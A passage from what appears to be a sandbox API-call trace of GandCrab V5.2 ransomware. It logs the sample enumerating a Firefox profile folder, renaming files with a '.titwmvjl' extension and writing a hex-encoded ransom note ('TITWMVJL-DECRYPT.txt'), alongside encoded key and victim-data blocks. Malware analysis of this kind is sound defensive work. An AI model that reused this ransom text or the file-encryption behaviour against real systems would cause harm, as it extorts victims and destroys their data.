x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.380] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0084.381] CloseHandle (hObject=0x2d4) returned 1 [0084.381] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.381] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.381] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1d, wMilliseconds=0x2ba)) [0084.381] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.382] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.382] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.382] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock") returned 112 [0084.382] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0084.384] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.384] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.384] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\") returned 88 [0084.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*" [0084.384] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503578 [0084.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.384] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.385] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.386] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.386] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0084.386] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0084.386] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock" [0084.386] lstrlenW (lpString=".titwmvjl") returned 9 [0084.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock") returned 112 [0084.386] VirtualAlloc (lpAddress=0x0, dwSize=0x120, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.386] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 121 [0084.386] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\d2ca4a09d2ca4deb61a.lock") returned 112 [0084.386] lstrlenW (lpString=".lock") returned 5 [0084.386] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0084.386] wsprintfW (in: param_1=0x2310000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.386] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.386] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.387] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0084.387] lstrcmpW (lpString1="permanent", lpString2=".") returned 1 [0084.387] lstrcmpW (lpString1="permanent", lpString2="..") returned 1 [0084.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\", lpString2="permanent" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0084.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\" [0084.387] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.387] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.388] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.388] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.388] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.388] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\\\TITWMVJL-DECRYPT.txt") returned 119 [0084.388] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0084.389] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2